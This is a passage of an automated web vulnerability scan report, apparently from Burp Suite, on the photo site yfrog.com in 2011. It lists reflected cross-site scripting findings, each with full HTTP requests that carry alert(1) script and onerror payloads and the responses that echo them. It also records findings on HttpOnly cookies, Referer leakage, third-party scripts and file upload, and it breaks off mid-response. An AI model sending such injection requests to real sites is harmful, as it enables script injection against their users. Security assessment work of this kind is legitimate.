Confidence:   Certain
Host:   http://yfrog.com
Path:   /js/common.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e100e<script>alert(1)</script>19aa083a506 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jse100e<script>alert(1)</script>19aa083a506/common.js?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:42:49 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16608

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find jse100e<script>alert(1)</script>19aa083a506</h2>
...[SNIP]...

1.16. http://yfrog.com/js/home.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /js/home.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95a2e<script>alert(1)</script>4491e0e8efe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js95a2e<script>alert(1)</script>4491e0e8efe/home.js?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:42:45 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16608

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find js95a2e<script>alert(1)</script>4491e0e8efe</h2>
...[SNIP]...

1.17. http://yfrog.com/js/jquery/jquery-1.4.2.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /js/jquery/jquery-1.4.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3f7cf<script>alert(1)</script>568feb51308 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js3f7cf<script>alert(1)</script>568feb51308/jquery/jquery-1.4.2.min.js?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/feed/carousel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:15 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find js3f7cf<script>alert(1)</script>568feb51308</h2>
...[SNIP]...

1.18. http://yfrog.com/js/jquery/jquery-1.6.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /js/jquery/jquery-1.6.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9436e<script>alert(1)</script>b657a4849a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js9436e<script>alert(1)</script>b657a4849a4/jquery/jquery-1.6.min.js?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:42:50 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16608

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find js9436e<script>alert(1)</script>b657a4849a4</h2>
...[SNIP]...

1.19. http://yfrog.com/js/jquery/jquery.jcarousel.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /js/jquery/jquery.jcarousel.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3227a<script>alert(1)</script>087d929867a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js3227a<script>alert(1)</script>087d929867a/jquery/jquery.jcarousel.min.js?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/feed/carousel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:04 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16608

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find js3227a<script>alert(1)</script>087d929867a</h2>
...[SNIP]...

1.20. http://yfrog.com/js/jquery/jquery.li-scroller.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /js/jquery/jquery.li-scroller.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dd51f<script>alert(1)</script>694ecb82c6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsdd51f<script>alert(1)</script>694ecb82c6c/jquery/jquery.li-scroller.js?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:42:49 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16608

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find jsdd51f<script>alert(1)</script>694ecb82c6c</h2>
...[SNIP]...

1.21. http://yfrog.com/js/swfobject.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17d63<script>alert(1)</script>8cdc1c7b554 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js17d63<script>alert(1)</script>8cdc1c7b554/swfobject.js?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:42:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16608

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find js17d63<script>alert(1)</script>8cdc1c7b554</h2>
...[SNIP]...

1.22. http://yfrog.com/user/avatars.json [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /user/avatars.json

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18d07<script>alert(1)</script>d3af03848de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user18d07<script>alert(1)</script>d3af03848de/avatars.json?screen_names%5B%5D=CJLeBlanc&screen_names%5B%5D=mrosenbaum711&screen_names%5B%5D=mark_salling&screen_names%5B%5D=fabioviviani&screen_names%5B%5D=frankenteen&screen_names%5B%5D=richardpbacon&screen_names%5B%5D=kaleycuoco&screen_names%5B%5D=JaySean&screen_names%5B%5D=msleamichele&screen_names%5B%5D=Laurenmanzo&screen_names%5B%5D=mrbradgoreski&screen_names%5B%5D=juliannehough&screen_names%5B%5D=brodyjenner HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:49:08 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16636

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Could not find user18d07<script>alert(1)</script>d3af03848de</h2>
...[SNIP]...

1.23. http://yfrog.com/user/avatars.json [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://yfrog.com
Path:   /user/avatars.json

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 731db<a>5b258978388 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/731db<a>5b258978388?screen_names%5B%5D=CJLeBlanc&screen_names%5B%5D=mrosenbaum711&screen_names%5B%5D=mark_salling&screen_names%5B%5D=fabioviviani&screen_names%5B%5D=frankenteen&screen_names%5B%5D=richardpbacon&screen_names%5B%5D=kaleycuoco&screen_names%5B%5D=JaySean&screen_names%5B%5D=msleamichele&screen_names%5B%5D=Laurenmanzo&screen_names%5B%5D=mrbradgoreski&screen_names%5B%5D=juliannehough&screen_names%5B%5D=brodyjenner HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:49:24 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 16621

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<h2>His last words were: Specified action, '731db<a>5b258978388Action' could not be found</h2>
...[SNIP]...

1.24. http://yfrog.com/user/avatars.json [screen_names%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yfrog.com
Path:   /user/avatars.json

Issue detail

The value of the screen_names%5B%5D request parameter is copied into the HTML document as plain text between tags. The payload 40063<img%20src%3da%20onerror%3dalert(1)>0390221b523 was submitted in the screen_names%5B%5D parameter. This input was echoed as 40063<img src=a onerror=alert(1)>0390221b523 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user/avatars.json?screen_names%5B%5D=CJLeBlanc40063<img%20src%3da%20onerror%3dalert(1)>0390221b523&screen_names%5B%5D=mrosenbaum711&screen_names%5B%5D=mark_salling&screen_names%5B%5D=fabioviviani&screen_names%5B%5D=frankenteen&screen_names%5B%5D=richardpbacon&screen_names%5B%5D=kaleycuoco&screen_names%5B%5D=JaySean&screen_names%5B%5D=msleamichele&screen_names%5B%5D=Laurenmanzo&screen_names%5B%5D=mrbradgoreski&screen_names%5B%5D=juliannehough&screen_names%5B%5D=brodyjenner HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.1.10.1313703770; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:43:45 GMT
Content-Type: application/json; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 1961

{"result":{"mrosenbaum711":"http:\/\/desmond.yfrog.com\/homepage\/scaled.php?host=a1&profile=1125065927&filename=6_normal.jpg&via=twitter","fabioviviani":"http:\/\/desmond.yfrog.com\/homepage\/scaled.
...[SNIP]...
an-HittheLight-IndiaTour_Edt_CDFront_normal.jpg&via=twitter","BrodyJenner":"http:\/\/desmond.yfrog.com\/homepage\/scaled.php?host=a2&profile=1343631216&filename=image_normal.jpg&via=twitter","CJLeBlanc40063<img src=a onerror=alert(1)>0390221b523":"\/images\/default_profile.png","mark_salling":"\/images\/default_profile.png","kaleycuoco":"\/images\/default_profile.png","JaySean":"\/images\/default_profile.png","brodyjenner":"\/images\/default_
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://yfrog.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET / HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:42:33 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Set-Cookie: oauth_token=deleted; expires=Wed, 18-Aug-2010 21:42:32 GMT; path=/; domain=yfrog.com
Set-Cookie: oauth_token_secret=deleted; expires=Wed, 18-Aug-2010 21:42:32 GMT; path=/; domain=yfrog.com
Vary: Accept-Encoding
Content-Length: 19252

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>yfrog ... Share
...[SNIP]...

3. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yfrog.com
Path:   /js/Utils.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /js/Utils.js?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:42:35 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Length: 46084

/*
*    Utils class to provide some basic and shared JS utilities.
*    This class requires jQuery library. Last tested with version 1.4.3
*    Author: Moe Hosseini
*/

var Utils = {
   //Media extension maps
...[SNIP]...
on(status) {
    if (match = status.match(/(\s|^)(#\w+)/g)) {
    $.each(match, function(index, elem) {
    var hashtag = elem.split('#')[1];
    status = status.replace(elem, '<a target="_blank" href="http://twitter.com/#!/search?q=%23' + hashtag + '" class="link">'+elem+'</a>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://yfrog.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yfrog.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:42:33 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Set-Cookie: oauth_token=deleted; expires=Wed, 18-Aug-2010 21:42:32 GMT; path=/; domain=yfrog.com
Set-Cookie: oauth_token_secret=deleted; expires=Wed, 18-Aug-2010 21:42:32 GMT; path=/; domain=yfrog.com
Vary: Accept-Encoding
Content-Length: 19252

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>yfrog ... Share
...[SNIP]...
</script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Start Google Analytics Tag -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-65DrxcUXjcWq6&callback=qc_results" ></script>
...[SNIP]...
<link href="/css/home.css?v=6c02a943
" rel="stylesheet" type="text/css">
   <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</style>
<script src='http://s3.amazonaws.com/getsatisfaction.com/feedback/feedback.js'type='text/javascript'></script>
...[SNIP]...

4.2. http://yfrog.com/popular/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yfrog.com
Path:   /popular/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /popular/ HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/popular/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1152308956-1313703769975; __gads=ID=2e6919bac9d53173:T=1313703756:S=ALNI_MazvnFRMumLjL5IOoqgREnEQHqABw; __utma=61929459.138366525.1313703770.1313703770.1313703770.1; __utmb=61929459.4.9.1313703920347; __utmc=61929459; __utmz=61929459.1313703770.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:45:09 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 88251

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
</script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Start Google Analytics Tag -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-65DrxcUXjcWq6&callback=qc_results" ></script>
...[SNIP]...
</style>
<script src='http://s3.amazonaws.com/getsatisfaction.com/feedback/feedback.js'type='text/javascript'></script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=yfrog"></script>
...[SNIP]...

5. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yfrog.com
Path:   /js/common.js

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /js/common.js?v=6c02a943 HTTP/1.1
Host: yfrog.com
Proxy-Connection: keep-alive
Referer: http://yfrog.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Thu, 18 Aug 2011 21:42:35 GMT
